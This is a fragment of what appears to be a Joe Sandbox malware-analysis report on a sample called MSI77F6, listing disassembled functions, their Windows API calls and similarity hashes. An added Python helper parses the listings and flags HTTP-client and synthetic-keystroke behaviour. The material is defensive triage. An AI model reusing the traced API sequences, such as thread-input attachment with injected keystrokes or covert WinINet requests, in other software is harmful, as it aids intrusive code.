                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ChildEnumWindows
                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                        • API String ID: 3555792229-1603158881
                                        • Opcode ID: 9edb2fbe0aa5d5bdd6a40be81fcd4b669a5afedca7b4125d1ce655bb95e9a77e
                                        • Instruction ID: aed80eb2b5311a081fc7198ceb2b4edbe11a118da7c7fb191f2795c1ebd46f08
                                        • Opcode Fuzzy Hash: 9edb2fbe0aa5d5bdd6a40be81fcd4b669a5afedca7b4125d1ce655bb95e9a77e
                                        • Instruction Fuzzy Hash: 2A91D470600506EACB18EF60C485BEDFB75FF4A350F548219D85BA7551DF38AD8ACBA0
                                        APIs
                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007745F0
                                        • CoUninitialize.COMBASE ref: 00774695
                                        • UnregisterHotKey.USER32(?), ref: 007747BD
                                        • DestroyWindow.USER32(?), ref: 007E5936
                                        • FreeLibrary.KERNEL32(?), ref: 007E599D
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 007E59CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                        • String ID: close all
                                        • API String ID: 469580280-3243417748
                                        • Opcode ID: a692dbb450c3d2b6414615b989b4093b3d2257b0cedb8005aeaf594f648c7367
                                        • Instruction ID: 498b2f982008e9573e87b74640c2f75b133c29dd875dd59c65b423d918f978d8
                                        • Opcode Fuzzy Hash: a692dbb450c3d2b6414615b989b4093b3d2257b0cedb8005aeaf594f648c7367
                                        • Instruction Fuzzy Hash: 12912E34601606CFCB19EF14C899B68F3A4FF19744F5082A9E41E97262DB38AD66CF54
                                        APIs
                                        • SetWindowLongW.USER32(?,000000EB), ref: 0078C2D2
                                          • Part of subcall function 0078C697: GetClientRect.USER32(?,?), ref: 0078C6C0
                                          • Part of subcall function 0078C697: GetWindowRect.USER32(?,?), ref: 0078C701
                                          • Part of subcall function 0078C697: ScreenToClient.USER32(?,?), ref: 0078C729
                                        • GetDC.USER32 ref: 007EE006
                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007EE019
                                        • SelectObject.GDI32(00000000,00000000), ref: 007EE027
                                        • SelectObject.GDI32(00000000,00000000), ref: 007EE03C
                                        • ReleaseDC.USER32(?,00000000), ref: 007EE044
                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007EE0CF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                        • String ID: U
                                        • API String ID: 4009187628-3372436214
                                        • Opcode ID: 458a793eb627ce38743ebf0a7b43ea48a89e1bb538b78da28bc89e5f3e1bc8bf
                                        • Instruction ID: a3c6f75fabab564ffbfc31b93f90ca38dbfec24e496832118f1da3b2c4322bf7
                                        • Opcode Fuzzy Hash: 458a793eb627ce38743ebf0a7b43ea48a89e1bb538b78da28bc89e5f3e1bc8bf
                                        • Instruction Fuzzy Hash: 04710131501248DFCF31DFA4C884ABA7BB5FF48360F244A69ED569A1A6C7398C41DB61
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007C4C5E
                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007C4C8A
                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 007C4CCC
                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007C4CE1
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007C4CEE
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 007C4D1E
                                        • InternetCloseHandle.WININET(00000000), ref: 007C4D65
                                          • Part of subcall function 007C56A9: GetLastError.KERNEL32(?,?,007C4A2B,00000000,00000000,00000001), ref: 007C56BE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                        • String ID:
                                        • API String ID: 1241431887-3916222277
                                        • Opcode ID: d5913e0cb8900a8fdb56c9c87190f651ce8bdd47cb7ce7c7c532ce350b376013
                                        • Instruction ID: e3af159927f4ca3b1fd0c1e678cab42a131085512d41556b44fddcae94331a77
                                        • Opcode Fuzzy Hash: d5913e0cb8900a8fdb56c9c87190f651ce8bdd47cb7ce7c7c532ce350b376013
                                        • Instruction Fuzzy Hash: 38417DB1601618BFEB22AF60CC99FFA77ADFF08314F10811EFA019A151D7789D449BA4
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0080DBF0), ref: 007CBBA1
                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0080DBF0), ref: 007CBBD5
                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007CBD33
                                        • SysFreeString.OLEAUT32(?), ref: 007CBD5D
                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 007CBEAD
                                        • ProgIDFromCLSID.COMBASE(?,?), ref: 007CBEF7
                                        • CoTaskMemFree.COMBASE(?), ref: 007CBF14
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                        • String ID:
                                        • API String ID: 793797124-0
                                        • Opcode ID: 54165bdf21db30838f5d91f28a824fc17f759dadf1516956cacedaf2f6b5f1ca
                                        • Instruction ID: a63d9775172cd185c6687a1d36732475cf8079972ce23ae8b14f0793be369c2a
                                        • Opcode Fuzzy Hash: 54165bdf21db30838f5d91f28a824fc17f759dadf1516956cacedaf2f6b5f1ca
                                        • Instruction Fuzzy Hash: F8F11875A00109EFCB14DFA4C899EAEB7B9FF89715F10849CF905AB250DB35AE41CB50
                                        APIs
                                          • Part of subcall function 007749CA: InvalidateRect.USER32(?,00000000,00000001), ref: 00774A23
                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0078B85B), ref: 0078B926
                                        • KillTimer.USER32(00000000,?,?,?,?,0078B85B,00000000,?,?,0078AF1E,?,?), ref: 0078B9BD
                                        • DestroyAcceleratorTable.USER32(00000000), ref: 007EE775
                                        • DeleteObject.GDI32(00000000), ref: 007EE7EB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                        • String ID:
                                        • API String ID: 2402799130-0
                                        • Opcode ID: 31a910a0e898598d63cb8e7c0af0076adf7a6be7fd3addca379ae046d83525d4
                                        • Instruction ID: 6d4d13567c89ae02ec6c8f10047e99689b76184652c5d385f36a9e232ff03244
                                        • Opcode Fuzzy Hash: 31a910a0e898598d63cb8e7c0af0076adf7a6be7fd3addca379ae046d83525d4
                                        • Instruction Fuzzy Hash: 86616930141701DFDB35AF26D988B35BBF6FB99712F144929E18686A70C778B890DB88
                                        APIs
                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007DB204
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: InvalidateRect
                                        • String ID:
                                        • API String ID: 634782764-0
                                        • Opcode ID: 0eed7b4d4494af02d357b4d4a80b16d992d5b3eccda9e623e4a21ed2f6addaad
                                        • Instruction ID: 9ea6b0c87c74f506774ad19359f3bbcccd8698c4ccc8440828f8861482227b85
                                        • Opcode Fuzzy Hash: 0eed7b4d4494af02d357b4d4a80b16d992d5b3eccda9e623e4a21ed2f6addaad
                                        • Instruction Fuzzy Hash: CC516E31600208FEEF20AB288C99BAE3B75BB06764F214517F915D63A1DB79E9509B50
                                        APIs
                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007EE9EA
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007EEA0B
                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007EEA20
                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007EEA3D
                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007EEA64
                                        • DestroyCursor.USER32(00000000), ref: 007EEA6F
                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007EEA8C
                                        • DestroyCursor.USER32(00000000), ref: 007EEA97
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                        • String ID:
                                        • API String ID: 3992029641-0
                                        • Opcode ID: fc6fb3ea3be142ac3fe4d4270dfe4e1ee20032f7370d40cb45255731a8402996
                                        • Instruction ID: d7fab4c2fc52a8446782f71402d2d386c079cba1b534f4850f2e9e27f28aebff
                                        • Opcode Fuzzy Hash: fc6fb3ea3be142ac3fe4d4270dfe4e1ee20032f7370d40cb45255731a8402996
                                        • Instruction Fuzzy Hash: 9F51AB70640205EFEB20EF65CC85FAA77F5BB48750F104A29F94697290E7B8EC90CB51
                                        APIs
                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,007EE9A0,00000004,00000000,00000000), ref: 0078F737
                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,007EE9A0,00000004,00000000,00000000), ref: 0078F77E
                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,007EE9A0,00000004,00000000,00000000), ref: 007EEB55
                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,007EE9A0,00000004,00000000,00000000), ref: 007EEBC1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ShowWindow
                                        • String ID:
                                        • API String ID: 1268545403-0
                                        • Opcode ID: 802c6c66db86bd76c0aa4221c41c040459cd9455ae3d991a7abd2225ad8688f7
                                        • Instruction ID: 948af06d694b9db17b91556c7fe927f0dbef07be4be892d3781e35e690378ccd
                                        • Opcode Fuzzy Hash: 802c6c66db86bd76c0aa4221c41c040459cd9455ae3d991a7abd2225ad8688f7
                                        • Instruction Fuzzy Hash: E84117702496C0EAFB357B398CCCB7A7B96AB49305FA84C3DE08BC6561D67CA840D715
                                        APIs
                                          • Part of subcall function 007AE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 007AE158
                                          • Part of subcall function 007AE138: GetCurrentThreadId.KERNEL32 ref: 007AE15F
                                          • Part of subcall function 007AE138: AttachThreadInput.USER32(00000000,?,007ACDFB,?,00000001), ref: 007AE166
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 007ACE06
                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007ACE23
                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007ACE26
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 007ACE2F
                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007ACE4D
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007ACE50
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 007ACE59
                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007ACE70
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007ACE73
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                        • String ID:
                                        • API String ID: 2014098862-0
                                        • Opcode ID: 74e5005e066492264c202a33a04c6fead6f17700c4c0c5425d30accce354ad75
                                        • Instruction ID: 6f045008ef909c85259df76ec80b02277b715837c2eef28489f0381ab506ff21
                                        • Opcode Fuzzy Hash: 74e5005e066492264c202a33a04c6fead6f17700c4c0c5425d30accce354ad75
                                        • Instruction Fuzzy Hash: 6A1104B152061CBEF7212F60CC8EF6A3B2EDB48794F110515F340AB0E0C9FA6C10DAA8
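                                         The WinINet record above (InternetConnectW / HttpOpenRequestW / InternetSetOptionW / HttpSendRequestW) and the keystroke-injection record directly above (AttachThreadInput followed by PostMessageW with message 0x100 and 0x101) are both easier to triage once the "APIs" listings are turned into structured records. The following helper is an added example written for this editorial pass; it is not part of the Joe Sandbox report and not code from the analysed sample. Its sample input is copied from the listings on this page; the constant names it decodes (INTERNET_OPTION_SECURITY_FLAGS = 31, HTTP_QUERY_CONTENT_LENGTH = 5, WM_KEYDOWN = 0x100, WM_KEYUP = 0x101, WM_SETICON = 0x80, VK_LEFT = 0x25, VK_RIGHT = 0x27) are Windows SDK values, and the capability labels ("http-client", "synthetic-keystrokes") are my own naming, not Joe Sandbox's.

```python
import re

# Constructed sample: "APIs" lines copied from this report page, in the layout the
# page uses (bullet, API.MODULE(args), ref: address; subcalls are indented).
SAMPLE = """\
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007C4C5E
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007C4C8A
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 007C4CCC
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007C4CE1
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007C4CEE
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 007C4D1E
• InternetCloseHandle.WININET(00000000), ref: 007C4D65
  • Part of subcall function 007C56A9: GetLastError.KERNEL32(?,?,007C4A2B,00000000,00000000,00000001), ref: 007C56BE
APIs
  • Part of subcall function 007AE138: AttachThreadInput.USER32(00000000,?,007ACDFB,?,00000001), ref: 007AE166
• MapVirtualKeyW.USER32(00000025,00000000), ref: 007ACE06
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007ACE23
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007ACE26
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007ACE70
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007745F0
• CoUninitialize.COMBASE ref: 00774695
• _memset.LIBCMT ref: 007CC6BA
"""

# One call line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Api.MODULE, optional "(args)", then "ref: XXXXXXXX".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Windows SDK constants (assumed from the SDK headers, not from the report).
WININET_OPTION = {0x1F: "INTERNET_OPTION_SECURITY_FLAGS"}
HTTP_QUERY = {0x05: "HTTP_QUERY_CONTENT_LENGTH"}
WM = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP", 0x80: "WM_SETICON"}
VK = {0x25: "VK_LEFT", 0x27: "VK_RIGHT"}


def _arg(tok):
    """'?' means the sandbox could not recover the value; hex otherwise; strings stay."""
    tok = tok.strip()
    if tok == "?":
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return tok  # literal string argument such as "close all"


def parse_calls(text):
    """Split the listing into per-function records, one record per 'APIs' header."""
    functions, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            functions.append(current)
            continue
        m = CALL_RE.match(line)
        if not m or current is None:
            continue
        raw = m.group("args")
        args = [_arg(a) for a in raw.split(",")] if raw else []
        current.append({
            "api": m.group("api"), "module": m.group("mod"), "args": args,
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub"),  # set when the call sits inside a callee
        })
    return functions


def annotate(call):
    """Decode the few argument constants that are unambiguous from the listing."""
    api, args, notes = call["api"], call["args"], []
    if api in ("InternetSetOptionW", "InternetQueryOptionW") and len(args) > 1:
        notes += [WININET_OPTION[args[1]]] if args[1] in WININET_OPTION else []
    if api == "HttpQueryInfoW" and len(args) > 1 and args[1] in HTTP_QUERY:
        notes.append(HTTP_QUERY[args[1]])
    if api in ("PostMessageW", "SendMessageW") and len(args) > 1 and args[1] in WM:
        notes.append(WM[args[1]])
        if args[1] in (0x100, 0x101) and len(args) > 2 and args[2] in VK:
            notes.append(VK[args[2]])  # wParam of WM_KEYDOWN/WM_KEYUP is the VK code
    return notes


def capabilities(calls):
    """Coarse capability labels (my own naming) derived from the API set of one function."""
    apis = {c["api"] for c in calls}
    caps = set()
    if {"InternetConnectW", "HttpOpenRequestW", "HttpSendRequestW"} <= apis:
        caps.add("http-client")
    if "AttachThreadInput" in apis and any(
        c["api"] == "PostMessageW" and len(c["args"]) > 1 and c["args"][1] in (0x100, 0x101)
        for c in calls
    ):
        caps.add("synthetic-keystrokes")
    return caps


if __name__ == "__main__":
    for i, fn in enumerate(parse_calls(SAMPLE)):
        print(f"function {i}: {sorted(capabilities(fn))}")
        for c in fn:
            print(f"  {c['ref']:08X} {c['api']}.{c['module']} {annotate(c)}")
```

The third argument of InternetSetOptionW is the lpBuffer pointer, so the 00000100 printed there is deliberately not decoded; only the option ID in the second slot is. Records that come from a "Part of subcall function" line keep the callee address in the subcall field so the capability labels can be attributed to the right function.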
                                        APIs
                                          • Part of subcall function 007AA857: CLSIDFromProgID.COMBASE ref: 007AA874
                                          • Part of subcall function 007AA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 007AA88F
                                          • Part of subcall function 007AA857: lstrcmpiW.KERNEL32(?,00000000), ref: 007AA89D
                                          • Part of subcall function 007AA857: CoTaskMemFree.COMBASE(00000000), ref: 007AA8AD
                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 007CC6AD
                                        • _memset.LIBCMT ref: 007CC6BA
                                        • _memset.LIBCMT ref: 007CC7D8
                                        • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 007CC804
                                        • CoTaskMemFree.COMBASE(?), ref: 007CC80F
                                        Strings
                                        • NULL Pointer assignment, xrefs: 007CC85D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                        • String ID: NULL Pointer assignment
                                        • API String ID: 1300414916-2785691316
                                        • Opcode ID: 828e3ba2f8200f2cba73b3f2b32fb46a90d673a927a2f2922356a08dab747102
                                        • Instruction ID: 756b77e1ffe4754462542e2a9838b4081feed09e08ae2202f37b2b0c9fac9eff
                                        • Opcode Fuzzy Hash: 828e3ba2f8200f2cba73b3f2b32fb46a90d673a927a2f2922356a08dab747102
                                        • Instruction Fuzzy Hash: BC914771D00218EBDB21DFA4DC85FDEBBB9EF08750F20816AE519A7281DB745A45CFA0
                                        APIs
                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007D9926
                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 007D993A
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007D9954
                                        • _wcscat.LIBCMT ref: 007D99AF
                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 007D99C6
                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007D99F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
